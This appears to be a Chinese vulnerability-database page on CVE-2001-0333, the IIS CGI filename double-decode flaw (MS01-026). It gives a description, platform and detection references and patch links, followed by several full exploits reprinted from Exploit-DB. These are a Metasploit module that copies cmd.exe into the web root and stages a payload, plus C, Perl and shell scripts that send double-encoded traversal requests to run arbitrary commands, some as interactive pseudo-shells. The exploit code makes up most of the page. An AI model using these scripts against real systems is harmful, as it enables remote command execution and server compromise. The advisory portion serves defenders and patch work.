CVE-2001-0333
CVSS7.5
发布时间 :2001-06-27 00:00:00
修订时间 :2016-10-17 22:10:40
NMCOEPS    

[原文]Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.


[CNNVD]Microsoft IIS CGI文件名错误解码漏洞(MS01-026)(CNNVD-200106-190)

        
        IIS 是微软出品的一个广泛应用的Internet Web服务器软件,随Windows NT和Windows 2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。
        NSFOCUS安全小组发现微软IIS 4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,远程攻击者可能利用此漏洞以Web进程的权限在主机上执行任意系统命令。
        IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为".exe"或".com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。
        通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"../"或"./"的检查,在某些条件下,攻击者可以执行任意系统命令。
        例如,对于'\'这个字符,正常编码后是%5c。这三个字符对应的编码为:
        '%' = %25
        '5' = %35
        'c' = %63
        如果要对这三个字符再做一次编码,就可以有多种形式,例如:
        %255c
        %%35c
        %%35%63
        %25%35%63
        ...
        因此,"..\"就可以表示成"..%255c"或"..%%35c"等等形式。
        在经过第一次解码之后,变成"..%5c"。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成"..\"。因此攻击者就可以使用"..\"来进行目录遍历,执行Web目录之外的任意程序。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:5.0
cpe:/a:microsoft:internet_information_server:4.0Microsoft IIS 4.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:78Windows 2000 IIS Directory Traversal Command Execution (Test 1)
oval:org.mitre.oval:def:37Windows NT IIS Directory Traversal Command Execution (Test 1)
oval:org.mitre.oval:def:1051Windows 2000 IIS Directory Traversal Command Execution (Test 2)
oval:org.mitre.oval:def:1018Windows NT IIS Directory Traversal Command Execution (Test 2)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0333
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-190
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98992056521300&w=2
(UNKNOWN)  BUGTRAQ  20010515 NSFOCUS SA2001-02 : Microsoft IIS CGI Filename Decode Error Vulnerability
http://www.cert.org/advisories/CA-2001-12.html
(UNKNOWN)  CERT  CA-2001-12
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
(VENDOR_ADVISORY)  MS  MS01-026
http://www.securityfocus.com/bid/2708
(UNKNOWN)  BID  2708
http://xforce.iss.net/static/6534.php
(UNKNOWN)  XF  iis-url-decoding(6534)

- 漏洞信息

Microsoft IIS CGI文件名错误解码漏洞(MS01-026)
高危 设计错误
2001-06-27 00:00:00 2005-10-12 00:00:00
远程  
        
        IIS 是微软出品的一个广泛应用的Internet Web服务器软件,随Windows NT和Windows 2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。
        NSFOCUS安全小组发现微软IIS 4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,远程攻击者可能利用此漏洞以Web进程的权限在主机上执行任意系统命令。
        IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为".exe"或".com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。
        通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"../"或"./"的检查,在某些条件下,攻击者可以执行任意系统命令。
        例如,对于'\'这个字符,正常编码后是%5c。这三个字符对应的编码为:
        '%' = %25
        '5' = %35
        'c' = %63
        如果要对这三个字符再做一次编码,就可以有多种形式,例如:
        %255c
        %%35c
        %%35%63
        %25%35%63
        ...
        因此,"..\"就可以表示成"..%255c"或"..%%35c"等等形式。
        在经过第一次解码之后,变成"..%5c"。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成"..\"。因此攻击者就可以使用"..\"来进行目录遍历,执行Web目录之外的任意程序。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果不需要可执行的CGI,可以删除可执行虚拟目录,例如 /scripts 等等。
        * 如果确实需要可执行的虚拟目录,建议将可执行虚拟目录单独放在一个分区,将所有可被攻击者利用的命令行工具移到另外一个目录中并禁止GUEST组访问。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS01-026)以及相应补丁:
        MS01-026:14 May 2001 Cumulative Patch for IIS
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

        补丁下载:
        Microsoft IIS 4.0:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787

        Microsoft IIS 5.0:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764

- 漏洞信息 (16467)

Microsoft IIS/PWS CGI Filename Double Decode Command Execution (EDBID:16467)
windows remote
2011-01-08 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	# NOTE: This cannot be an HttpClient module since the response from the server
	# is not a valid HttpResponse
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft IIS installation
				that is vulnerable to the CGI double-decode vulnerability of 2001.

				NOTE: This module will leave a metasploit payload in the IIS scripts directory.
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11513 $',
			'References'     =>
				[
					[ 'CVE', '2001-0333' ],
					[ 'OSVDB', '556' ],
					[ 'BID', '2708' ],
					[ 'MSB', 'MS01-026' ],
					[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 15 2001'
		))

		register_options(
			[
				Opt::RPORT(80),
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
			], self.class)

		framework.events.add_exploit_subscriber(self)
	end


	def dotdotslash
		possibilities = [
			"..%255c",
			"..%%35c",
			"..%%35%63",
			"..%25%35%63",
			".%252e/",
			"%252e./",
			"%%32%65./",
			".%%32%65/",
			".%25%32%65/",
			"%25%32%65./"
		]
		possibilities[rand(possibilities.length)]
	end


	def mini_http_request(opts, timeout=5)
		connect
		req = ''
		req << opts['method']
		req << ' '
		req << opts['uri']
		req << ' '
		req << "HTTP/1.0\r\n"
		req << "Host: #{datastore['RHOST']}\r\n"
		req << "\r\n"
		sock.put(req)

		# This isn't exactly awesome, but it seems to work..
		begin
			headers = sock.get_once(-1, timeout)
			body = sock.get_once(-1, timeout)
		rescue ::EOFError
			# nothing
		end

		if (datastore['DEBUG'])
			print_status("Headers:\n" + headers.inspect)
			print_status("Body:\n" + body.inspect)
		end
		disconnect
		[headers, body]
	end


	def check
		res = execute_command("dir")
		if (res.kind_of?(Array))
			body = res[1]
			if (body and body =~ /Directory of /)
				return Exploit::CheckCode::Vulnerable
			end
		end

		Exploit::CheckCode::Safe
	end


	#
	# NOTE: the command executes regardless of whether or not
	# a valid response is returned...
	#
	def execute_command(cmd, opts = {})

		# Don't try the start command...
		# Using the "start" method doesn't seem to make iis very happy :(
		return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/

		print_status("Executing command: #{cmd}")

		uri = '/scripts/'
		exe = opts[:cgifname]
		if (not exe)
			uri << dotdotslash
			uri << dotdotslash
			uri << 'winnt/system32/cmd.exe'
		else
			uri << exe
		end
		uri << '?/x+/c+'
		uri << Rex::Text.uri_encode(cmd)

		if (datastore['VERBOSE'])
			print_status("Attemping to execute: #{uri}")
		end

		mini_http_request({
				'uri'     => uri,
				'method'  => 'GET',
			}, 20)
	end


	def exploit

		# first copy the file
		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
		# NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
		# However, it using %SystemRoot% doesn't seem to work :(
		res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")

		if (datastore['CMD'])
			res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
			if (res[0])
				print_status("Command output:\n" + res[0])
			else
				print_error("No output received")
			end

			res = execute_command("del #{exe_fname}")
			return
		end

		# Use the CMD stager to get a payload running
		execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })

		# Save these file names for later deletion
		@exe_cmd_copy = exe_fname
		@exe_payload = payload_exe

		# Just for good measure, we'll make a quick, direct request for the payload
		# Using the "start" method doesn't seem to make iis very happy :(
		print_status("Triggering the payload via a direct request...")
		mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)

		handler

	end

	#
	# The following handles deleting the copied cmd.exe and payload exe!
	#
	def on_new_session(client)

		if client.type != "meterpreter"
			print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
			print_error("The copied exe and the payload exe must be removed manually.")
			return
		end

		return if not @exe_cmd_copy

		# stdapi must be loaded before we can use fs.file
		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

		# Delete the copied CMD.exe
		print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
		client.fs.file.rm(@exe_cmd_copy)

		# Migrate so  that we can delete the payload exe
		client.console.run_single("run migrate -f")

		# Delete the payload exe
		return if not @exe_payload

		delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload

		print_status("Changing permissions on #{delete_me_too} ...")
		cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
		client.sys.process.execute(cmd, nil, {'Hidden' => true })

		print_status("Deleting #{delete_me_too} ...")
		begin
			client.fs.file.rm(delete_me_too)
		rescue ::Exception => e
			print_error("Exception: #{e.inspect}")
		end
	end

	def cleanup
		framework.events.remove_exploit_subscriber(self)
	end

end
		

- 漏洞信息 (20835)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1) (EDBID:20835)
windows remote
2001-05-15 Verified
0 Filip Maertens
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info

Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.

When IIS receives a CGI filename request, it automatically performs two actions before completing the request:

1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.

2. When the security check is completed, IIS decodes CGI parameters.

A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.

Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.

Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.

The worm Nimda(and variants) actively exploit this vulnerability. 

/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER:    This  is  proof of concept code.  This means, this
code
 * may only be used on approved systems in order to test the
availability
 * and integrity of machines  during a legal penetration test.  In no
way
 * is the  author of  this exploit  responsible for the use and result
of
 * this code.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>


/* Modify this value to whichever sequence you want.
 *
 * %255c = %%35c = %%35%63 = %25%35%63 = /
 *
 */

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"



int main(int argc, char *argv[])
{

 struct sockaddr_in sin;
 char recvbuffer[1], stuff[200];
 int create_socket;

 printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |
<filip@securax.be>\n-------------------------------------------------------------------------\n");

 if (argc < 3)
 {
  printf(" -- Usage: iisexec [ip] [command]\n");
  exit(0);
 }


if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
 printf(" -- Socket created.\n");

 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);

if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
 printf(" -- Connection made.\n");
else
 { printf(" -- No connection.\n"); exit(1); }


 strcat(stuff, "GET ");
 strcat(stuff, SHOWSEQUENCE);
 strcat(stuff, argv[2]);
 strcat(stuff, " HTTP/1.0\n\n");

 memset(recvbuffer, '\0',sizeof(recvbuffer));

 send(create_socket, stuff, sizeof(stuff), 0);
 recv(create_socket, recvbuffer, sizeof (recvbuffer),0);



 if ( ( strstr(recvbuffer,"404") == NULL ) )

     printf(" -- Command output:\n\n");
     while(recv(create_socket, recvbuffer, 1, 0) > 0)
   {
     printf("%c", recvbuffer[0]);
   }

 else
  printf(" -- Wrong command processing. \n");

 close(create_socket);

}
		

- 漏洞信息 (20836)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2) (EDBID:20836)
windows remote
2001-05-16 Verified
0 HuXfLuX
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
 
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
 
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
 
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
 
2. When the security check is completed, IIS decodes CGI parameters.
 
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
 
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
 
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
 
The worm Nimda(and variants) actively exploit this vulnerability.
 
/*  IISEX by HuXfLuX <huxflux2001@hotmail.com>. IIS CGI File Decode Bug
exploit. Written 16-05-2001.
    Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's
products were always
    famous for their backward compatibility!

    You can change the SHOWSEQUENCE value to some other strings that also
work.
    More info: http://www.nsfocus.com

    Thanx to Filip Maertens <filip@securax.be>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

int main(int argc, char *argv[])
{

        struct sockaddr_in sin;
        struct in_addr victim;
        char recvbuffer[1], stuff[200]="";
        int create_socket;

        printf("IISEX by HuxFlux <huxflux2001@hotmail.com>\nThis exploits
the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and
5!.\n");

        if (argc < 3)
        {
                printf("[?] Usage: %s [ip] [command]\n", argv[0]);
                exit(0);
        }

        if (!resolv(argv[1],&victim))
        {
                printf("[x] Error resolving host.\n");
                exit(-1);
        }
        printf("\n[S] Exploit procedure beginning.\n");

        if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf("[*] Socket created.\n");

        bzero(&sin,sizeof(sin));
        memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        //sin.sin_addr.s_addr = inet_addr(argv[1]);


        if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf("[*] Connection made.\n");
        else {
                printf("[x] No connection.\n");
                exit(1);
        }

        strcat(stuff, "GET ");
        strcat(stuff, SHOWSEQUENCE);
        strcat(stuff, argv[2]);
        strcat(stuff, " HTTP/1.0\r\n\r\n");
        printf("[*] Sending: %s", stuff);

        memset(recvbuffer, '\0',sizeof(recvbuffer));

        send(create_socket, stuff, sizeof(stuff), 0);

        if ( strstr(recvbuffer,"404") == NULL ) {
                printf("[*] Command output:\n\n");

                while(recv(create_socket, recvbuffer, 1, 0) > 0)
                {
                        printf("%c", recvbuffer[0]);
                }
                printf("\n\n");
        }
        else printf("[x] Wrong command processing. \n");
        printf("[E] Finished.\n");

        close(create_socket);
}

int resolv(char *hostname,struct in_addr *addr)
{
        struct hostent *res;

        if (inet_aton(hostname,addr)) return(1);

        res = gethostbyname(hostname);
        if (res == NULL) return(0);

        memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
        return(1);
}
		

- 漏洞信息 (20837)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3) (EDBID:20837)
windows remote
2001-05-15 Verified
0 Cyrus The Gerat
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
  
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
  
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
  
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
  
2. When the security check is completed, IIS decodes CGI parameters.
  
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
  
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
  
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
  
The worm Nimda(and variants) actively exploit this vulnerability.

#!/usr/bin/perl
# Written by Cyrus The Gerat , CyrusArmy@Bigfoot.com ,
May 15th 2001
# This perl script lets you to test the vulnerable
servers to IIS4/5 CGI decode hole,
# Also you can exploit the hole and execute your
commands remotely!
# Vulnerability found by NSfocus security team,
# Tested for compatibility on UNIX/WINDOWS
(activestate perl)
# Works well on windows and unix platforms,


$ARGC=@ARGV;
if ($ARGC <3) {
 print "\n\nRemote IIS4/5 decode hole tester! By
CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
 print "\n Usage:\n\n $0 <victim host> <victim port>
<command line to execute>\n\n";
	print "        Victim Host: Address of IIS4/5 server
vulnerable to decode hole! \n";
      print "        Victim port: HTTP/HTTPS port 80
or 443\n";
	print "        Command to Execute: for example \"echo
Just hacked! > hacked.txt\"  \n\n";
	exit;
}
use Socket;

my
($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied);
$host=$ARGV[0];
$port=$ARGV[1];
$target=inet_aton($host);
$notvulnerable=1;
$notfound=1;
$accessdenied=0;

print "\nRemote IIS4/5 decode hole tester! By
CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "Connecting to server $host port $port...,
\n\n";
@results=sendraw("GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
HTTP/1.0\r\n\r\n");

for ($i=0; $i <=7 ;$i++ ) {
print $results[$i];
}


foreach $line (@results){
 if ($line =~ /\[Version/) {
 $notvulnerable=0;
 print "\nWow! system is vulnerable.\n";
 print $line;
 }
 }

if ($notvulnerable) {
 print "\nOops! System is not vulnerable. \n";
 exit(1);
} 

# you can exchange Wow! and Oops! as you prefer! ;-)

print "\nChecking for command interpreter...\n";
@results=sendraw("GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe
HTTP/1.0\r\n\r\n");
#print @results;

foreach $line (@results){
 if ($line =~ /cyrus.exe/) {$notfound=0;}
}

if ($notfound) { 
 print "Command interpreter not found, Trying to copy
cmd.exe \n";
 @results=sendraw("GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe
HTTP/1.0\r\n\r\n");
#print @results;
 }

 foreach $line (@results){
  if (($line =~ /denied/ )) {$accessdenied=1;}
 }

 if ($accessdenied) {
 print"Cannot copy command interpreter, Try manually!
\n\n";
 exit(2);
 } else {
   print "Command interpreter OK \n";
  }

$command=@ARGV[2];
print "Now executing your command: $command \n\n";
#$command=~s/ /\%20/g;
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
#print $command;
my @results=sendraw("GET
/scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

    print STDOUT "\n\nMore commands? , or EOF to
end:\n";
    while ($command = <STDIN>) {
            print "You said: $command \n";
	    chop $command;
		$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
		my @results=sendraw("GET
/scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
		print @results;           
            print "\n\nTell me more, or EOF (^D/^Z) to
end:\n";
    }
    print "\nThat's all! Another IIS hole just
similified by cyrus!\n";

sub sendraw {   
        my ($pstr)=@_;
       
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0)
||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else {
		 print "Cannot connect to $host port $port\n";
		 exit(3); }
}

		

- 漏洞信息 (20838)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4) (EDBID:20838)
windows remote
2001-05-15 Verified
0 MovAX
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
   
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
   
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
   
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
   
2. When the security check is completed, IIS decodes CGI parameters.
   
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
   
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
   
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
   
The worm Nimda(and variants) actively exploit this vulnerability.

/*  lalaiis.c
    (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution
        Vulnerability) 
   
   Bugtraq id: 2708 

   It gives you a "shell-like" environment to test your IIS servers
   Coded by MovAX <movax@softhome.et>
   Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel>
   Fuckz to: Feel free to add your handle to this section.

*/


#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

void usage(void) 
{
 fprintf(stderr, "\nusage: ./lalaiis website> vulnerable_directory");
 fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)");
 fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n");
 exit(-1);
}

int main(int argc, char **argv) 
{
 int i, le_socket, le_connect_error, le_timeout ;
 int timeout=80;
 int port=80;
 char temp[1];
 char host[512]=""; 
 char command[1024]="";
 char request[8192]="GET /";
 struct hostent *he;
 struct sockaddr_in s_addr;

 printf(":: lalaiis.c exploit. Coded by MovAX\n");

 if (argc < 3)
    usage();
    
 strncpy(host, argv[1], sizeof(host));
 
 if(!strcmp(host, "")) 
	{
	 fprintf(stderr, "put a damn server\n");
	 usage();
	}

 printf("\n:: Destination host > %s:%d\n", host, port);


 if((he=gethostbyname(host)) == NULL) 
	{
 	 fprintf(stderr, "put a damn VALID server\n");
	 usage();
	}

for (;;)
{
		  command[0]=0;
		  printf("\nlala_shell> ");
		  if(fgets(command, sizeof(command), stdin) == NULL)
		  	  perror("gets"); 
		  command[strlen(command)-1]='\0';
		  if(!strcmp("logout", command))
		  	  exit(-1);

 	 for(i=0;i<strlen(command);i++) 
		 {if(command[i]==' ')
		  	command[i]='+';
		 }

	 strncpy(request, "GET /", sizeof(request));
         strncat(request, argv[2], sizeof(request) - strlen(request));
         strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request));
 	 strncat(request, command, sizeof(request) - strlen(request));
	 strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request));
	 strncat(request, "host:" ,sizeof(request) - strlen(request));
	 strncat(request, argv[1], sizeof(request) - strlen(request));	
 	 strncat(request, "\n\n", sizeof(request) - strlen(request));

	 s_addr.sin_family = AF_INET;
 	 s_addr.sin_port = htons(port);
 	 memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, 
 		sizeof(s_addr.sin_addr));	

 	 if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
		 {
	 	  perror("socket\n");
	 	  exit(-1);
		 }
 	 alarm(le_timeout);
 	 le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr));
 	 alarm(0);
	 
 	 if(le_connect_error==-1) 
		 {
	 	  perror("connect");
	 	  exit(-1);
	 	  close(le_socket);
		 }
		 
 	 send(le_socket, request, strlen(request), 0);
 	 while(recv(le_socket,temp,1, 0)>0) 
		 {
         	  alarm(timeout);
	 	  printf("%c", temp[0]);
         	  alarm(0);
		 }	
}
  close(le_socket);	
  return 0;
}
		

- 漏洞信息 (20839)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5) (EDBID:20839)
windows remote
2001-05-15 Verified
0 Leif Jakob
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
    
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
    
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
    
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
    
2. When the security check is completed, IIS decodes CGI parameters.
    
A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands.
    
Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes.
    
Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue.
    
The worm Nimda(and variants) actively exploit this vulnerability.

#!/bin/sh

# Copyright 2001 by Leif Jakob <bugtraq@jakob.weite-welt.com>
#
# do not abuse this code... blah blah :)

if [ -z "$1" ] ; then
    echo "usage:"
    echo "$0 hostname"
    exit 1
fi

host="$1"

NETCAT=`which netcat`

if [ -z "$NETCAT" ] ; then
    NETCAT=`which nc`
fi

if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
    echo "you need netcat to make this work"
    exit 1
fi

echo "using netcat:$NETCAT"

function makeRequest
{
    host="$1"
    count=$2
    cmd="$3"
    echo -n 'GET /scripts/'
    while [ $count -gt 0 ] ; do
	echo -n '..%255c'
	count=$((count-1))
    done
    echo -n 'winnt/system32/cmd.exe?/c+'
    echo -n "$cmd"
    echo ' HTTP/1.0'
    echo "Host: $host"
    echo ''
    echo 'dummy'
}

function testHost
{
    host="$1"
    count=10 # you can't overdo it
    cmd='dir+c:\'
    makeRequest "$host" "$count" "$cmd" | netcat -w 4 $host 80
}

testHost "$host"		

- 漏洞信息 (20840)

MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6) (EDBID:20840)
windows remote
2001-05-15 Verified
0 A.Ramos
N/A [点击下载]
source: http://www.securityfocus.com/bid/2708/info
     
Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host.
     
When IIS receives a CGI filename request, it automatically performs two actions before completing the request:
     
1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check.
     
2. When the security check is completed, IIS decodes CGI parameters.
     
